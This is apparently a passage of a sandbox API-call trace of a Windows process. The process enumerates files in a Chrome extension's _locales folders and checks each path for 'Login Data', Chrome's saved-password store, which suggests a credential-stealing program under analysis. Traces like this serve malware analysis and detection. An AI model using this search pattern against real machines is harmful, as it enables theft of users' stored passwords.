HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.534] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.534] lstrlenW (lpString="el") returned 2 [0161.534] GetProcessHeap () returned 0x8e0000 [0161.534] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.534] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" [0161.534] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.534] GetProcessHeap () returned 0x8e0000 [0161.534] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.534] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned 137 [0161.534] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned 137 [0161.534] lstrlenW (lpString="\\*.*") returned 4 [0161.534] GetProcessHeap () returned 0x8e0000 [0161.535] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.535] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" [0161.535] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*.*" [0161.535] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.536] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.536] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.536] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.536] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.536] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857e35d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.536] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned 137 [0161.536] lstrlenW (lpString="\\") returned 1 [0161.536] GetProcessHeap () returned 0x8e0000 [0161.536] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.536] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" [0161.536] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\" [0161.536] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\") returned 138 [0161.536] lstrlenW (lpString="messages.json") returned 13 [0161.536] GetProcessHeap () returned 0x8e0000 [0161.536] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.536] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\" [0161.536] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" [0161.536] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.536] GetProcessHeap () returned 0x8e0000 [0161.536] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.536] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", lpSrch="Login Data") returned 0x0 [0161.536] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.536] GetProcessHeap () returned 0x8e0000 [0161.536] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.536] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857e35d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.536] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.536] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.536] GetProcessHeap () returned 0x8e0000 [0161.536] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.536] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.537] GetProcessHeap () returned 0x8e0000 [0161.537] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.537] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="en_GB", cAlternateFileName="")) returned 1 [0161.537] lstrcmpiW (lpString1="en_GB", lpString2=".") returned 1 [0161.537] lstrcmpiW (lpString1="en_GB", lpString2="..") returned 1 [0161.537] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.537] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.537] lstrlenW (lpString="\\") returned 1 [0161.537] GetProcessHeap () returned 0x8e0000 [0161.537] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.537] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.537] lstrlenW (lpString="en_GB") returned 5 [0161.537] GetProcessHeap () returned 0x8e0000 [0161.537] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" [0161.537] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.537] GetProcessHeap () returned 0x8e0000 [0161.537] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.537] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned 140 [0161.537] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned 140 [0161.537] lstrlenW (lpString="\\*.*") returned 4 [0161.537] GetProcessHeap () returned 0x8e0000 [0161.537] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" [0161.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*.*" [0161.537] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.538] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.538] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.538] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.538] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.538] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.538] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned 140 [0161.538] lstrlenW (lpString="\\") returned 1 [0161.538] GetProcessHeap () returned 0x8e0000 [0161.538] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.538] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" [0161.538] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\" [0161.539] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\") returned 141 [0161.539] lstrlenW (lpString="messages.json") returned 13 [0161.539] GetProcessHeap () returned 0x8e0000 [0161.539] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.539] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\" [0161.539] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" [0161.539] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.539] GetProcessHeap () returned 0x8e0000 [0161.539] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.539] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json", lpSrch="Login Data") returned 0x0 [0161.539] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.539] GetProcessHeap () returned 0x8e0000 [0161.539] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.539] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.539] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.539] VirtualQuery (in: lpAddress=0x91a0a8, 